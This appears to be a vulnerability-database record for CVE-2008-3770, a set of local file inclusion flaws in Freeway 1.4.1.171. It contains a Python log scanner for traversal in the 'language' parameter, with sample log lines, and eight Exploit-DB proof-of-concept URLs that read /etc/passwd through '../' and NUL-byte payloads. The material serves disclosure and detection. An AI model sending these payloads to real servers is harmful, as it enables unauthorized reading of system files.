CVE-2008-3770
Published: 2008-08-22
Priority: P3 · 36 | Severity: medium | CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.39% (81.8th percentile)
Multiple directory traversal vulnerabilities in Freeway 1.4.1.171, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter to (1) includes/events_application_top.php; (2) english/account.php, (3) french/account.php, and (4) french/account_newsletters.php in includes/languages/; (5) includes/modules/faqdesk/faqdesk_article_require.php; (6) includes/modules/newsdesk/newsdesk_article_require.php; (7) card1.php, (8) loginbox.php, and (9) whos_online.php in templates/Freeway/boxes/; and (10) templates/Freeway/mainpage_modules/mainpage.php. NOTE: vector 1 may be the same as CVE-2008-3677.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| openfreeway | freeway | — | — |
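A log check for the request shape the description above defines (one of the ten listed scripts with a `..` segment or NUL byte in `language`), added here as an example; it is not part of the original record and is not a vendor rule. The combined-log format, the sample lines, the `/shop` install path and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The ten scripts named in the CVE-2008-3770 description, relative to [installdir].
AFFECTED = tuple("""
includes/events_application_top.php includes/languages/english/account.php
includes/languages/french/account.php includes/languages/french/account_newsletters.php
includes/modules/faqdesk/faqdesk_article_require.php
includes/modules/newsdesk/newsdesk_article_require.php
templates/Freeway/boxes/card1.php templates/Freeway/boxes/loginbox.php
templates/Freeway/boxes/whos_online.php templates/Freeway/mainpage_modules/mainpage.php
""".split())
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DOTDOT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # ".." as a whole path segment

def fully_decode(value, rounds=3):
    """Percent-decode `rounds` times so nested encodings (%252e -> %2e -> .) unwrap."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_language(line):
    """Return (script, decoded value) when a log line requests an affected script
    with a traversal segment or NUL byte in `language`; otherwise None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = fully_decode(url.path)
    script = next((s for s in AFFECTED if path.endswith("/" + s)), None)
    if script is None:
        return None
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl has already decoded once
        if key == "language" and (DOTDOT.search(value) or "\x00" in value):
            return script, value
    return None

# Constructed sample access-log lines (not real traffic); P is a made-up install path.
P = "/shop/templates/Freeway/boxes/"
SAMPLE_LOG = [
    f'203.0.113.5 - - [18/Aug/2008:10:00:01 +0000] "GET {P}whos_online.php?language=../../etc/passwd%00 HTTP/1.1" 200 1532',
    f'203.0.113.5 - - [18/Aug/2008:10:00:02 +0000] "GET {P}card1.php?language=%252e%252e%252fconfig HTTP/1.1" 200 310',
    f'198.51.100.7 - - [18/Aug/2008:10:00:03 +0000] "GET {P}loginbox.php?language=french HTTP/1.1" 200 845',
    '198.51.100.7 - - [18/Aug/2008:10:00:04 +0000] "GET /shop/index.php?language=../x HTTP/1.1" 404 0',
]

def scan(lines):  # [(line number, script, decoded value)] for each suspicious line
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := suspicious_language(line))]
```

With register_globals enabled, `language` can also arrive in a POST body or a cookie, which access logs do not record, so this check covers query-string requests only.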
No detection rules found.
Exploit-DB
Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
---
source: https://www.securityfocus.com/bid/30731/info
Freeway is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
Freeway 1.4.1.171 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00
Exploit-DB
Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion
exploitdb·2008-08-18
http://www.example.com/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00
No writeups or analysis indexed.
http://secunia.com/advisories/31475
http://securityreason.com/securityalert/4181
http://www.openfreeway.org/download/change-log.html
http://www.securityfocus.com/archive/1/495549/100/0/threaded
http://www.securityfocus.com/bid/30731
https://exchange.xforce.ibmcloud.com/vulnerabilities/45037